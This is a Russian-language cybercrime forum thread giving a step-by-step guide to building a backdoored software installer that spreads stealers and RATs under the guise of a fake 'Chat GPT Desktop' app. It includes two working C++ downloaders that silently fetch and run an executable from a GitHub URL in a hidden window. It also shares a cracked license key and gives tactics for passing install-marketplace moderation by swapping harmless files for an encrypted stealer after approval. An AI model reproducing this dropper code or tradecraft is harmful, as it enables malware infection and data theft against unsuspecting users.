Перейти к публикации
AD Обнал забытых BTC-кошельков + софт (Майнинг нового поколения)

Velsssss

Инсталлятор софта с backdoor

Автор: Velsssss, в Схемы и мануалы

Рекомендованные сообщения

Velsssss    1

Velsssss
Опубликовано:

Данный пример, всего лишь один из вариантов концепции распространения Stealer-ов, RAT и остальной малвари.

И так, нам понадобится следующий софт для реализации данного примера:

  • Smart Install Maker
  • Visual Studio
  • Wget (для windows) см. бонус в конце
  • Программа, которую по легенде будем распространять
  • 1-2, 3… dll-ки, в зависимости сколько дерьма будете грузить.
  • Зареганнный аккаунт на github или gitlab

Начало

Качаем Smart Install Maker:

Устанавливаем его и активируем (логин: phpbb3, пароль: Q8ZZZ-MV417-E0P2T-3MA3L-N24UV), иначе при инсталле вашего софта будет баннер что вы используете триальную версию Smart Install Maker.

Берем белый софт (файл), который будем распространять и выдавать за наш.

Можно выбрать любой софт, от ускорителей (бустеров), например gamebooster (смотри бонус в конце) до трейдинг-ботов. Лично я смастерил Chat GPT Desktop, так как по запросам в гугле он рулит, а вы включайте фантазию.

66bf6bdeb91fd4fa858cc.png
5511e2c6cfd24f200fb54.png

Создаем учетную запись на github.com (в моем случаи), можете создать на gitlab.

Из ранее скачанных безобидных DLL создаем SFX-архив (самораспаковывающийся), ставим на него пароль, в моем случаи «LOLZ» и грузим наш EXE файл (SFX-архив) на github в корень репозитория.

e0a874de5948e1e65ed04.png
 

Открываем Visual Studio и повторяем как на скринах:

«создание проекта» --> «консольное приложение» даем нашему приложению название, в моем случаи «update» жмем «создать»:

d24781e53d0aaf7d36126.png
16958c6e43257d17766bf.png
85a323cb0c9ab2fc34a87.png

В открывшемся окне все удаляем:

8a9fb8159c0da8aec334e.png

И вставляем следующий код: 

#pragma comment(lib, "urlmon.lib")
#include <Windows.h>
#include <string>

using namespace std;

int main()
{
    URLDownloadToFile(0, L" https://github.com/blade-ass/lolz/raw/main/vcruntime140.exe", L" vcruntime140.exe", 0, 0);
    ShellExecute(NULL, L"open", L" vcruntime140.exe", NULL, NULL, SW_HIDE);
    return 0;
}

Второй вариант, можно делать через «create process»: 

#pragma comment(lib, "urlmon.lib")
#include <Windows.h>
#include <string>

using namespace std;

int main()
{
    HRESULT result = URLDownloadToFile(NULL, L https://github.com/blade-ass/lolz/raw/main/vcruntime140.exe ", L" vcruntime140.exe", L" vcruntime140.exe", 0, NULL);
    if (result != S_OK) {
        // Handle the error
        return 1;
    }

    STARTUPINFO si = { sizeof(si) };
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    PROCESS_INFORMATION pi;
    BOOL success = CreateProcess(L" vcruntime140.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
    if (!success) {
        // Handle the error
        return 1;
    }

    return 0;
}

После чего выбираем «Сборка» далее «Собрать решение» как на скринах.

65fc0d1e0045b04384a51.png
e4ccc87390ddc9c2e3aba.png

И не забудьте заменить свои линки на github!!!

После успешной сборки кладем наш update.exe в папку с программой, которую будем выдавать за свою.

Дальше создаем проект в Smart Install Maker и не забываем менять инфу относительно своего файла, легенды или сайта (если такой есть).

Повторяем как на скринах или гуглим как пользоваться Smart Install Maker.

 
4203e2d5a116c183211f8.png
fd5770f597e605159d2e5.pngfd5770f597e605159d2e5.png
409a4a1a71ad1911f5a00.png409a4a1a71ad1911f5a00.png
b38b282f08876cbf2546d.png
390331e134946109dd69b.png
092afc1c2947ac49f17cf.png

После, прописываем такие команды в проекте:

449e97b4e24509187e34b.png
a9ef71e0da78fe7948048.png
7e681626288098512aa78.png
dd6c833892e8b7c5a7314.png
3a8fb782d3ea7aa40083b.png
5f64031389791943ba6b7.png

На выходе получаем наш setup.exe.

 

Ну, а после запуска setup.exe видим, что все прошло успешно. Как видно на скрине, наш инсталятор скачал нашу безобидную DLL с github.

8a0690996d2ea6a18b4dc.png8a0690996d2ea6a18b4dc.png
d0d62a4dd14e75b0e7a98.png

Если у вас прошло все хорошо, тогда поздравляю!

Пока на github архив с безобидных DLL-ок, то инсталятор тоже безобидный, только стоит залить криптованный билд на github, получаем back door для нашего билда (стилера).

Также, можно сделать другую концепцию распространения.

Используя методы стеганографии, мы можем разделить своего "зверька" на несколько фрагментов (пикчи). Тогда уже не будет качаться .EXE файл, а только пикча (фрагмент кода), после успешных скачиваний фрагментов они собираються на ПК жертвы в единый файл (билд) и отрабатывают.

Соответсвенно такими софтами можно проходить модерации на биржах инсталов, и почти везде, так как пикчу можно выдавать за обновление для белого софта. То есть, пока проходим модерацию, то качаем безобидные файлы или DLL-ки, как только прошли модерацию, то на гитхаб залеваем наш зловред.

0

Поделиться сообщением

Ссылка на сообщение

OeRLiKoN    3

OeRLiKoN
Опубликовано:

Ну по сути изи Downloader на c++ склеенный с прогой через иснталятор. Я в принципе всегда так и делал.

0

Поделиться сообщением

Ссылка на сообщение

Megido    0

Megido
Опубликовано:
23 часа назад, OeRLiKoN сказал:

Ну по сути изи Downloader на c++ склеенный с прогой через иснталятор. Я в принципе всегда так и делал.

Какой процент отстук?

0

Поделиться сообщением

Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас
Перейти к списку тем
×
×
  • Создать...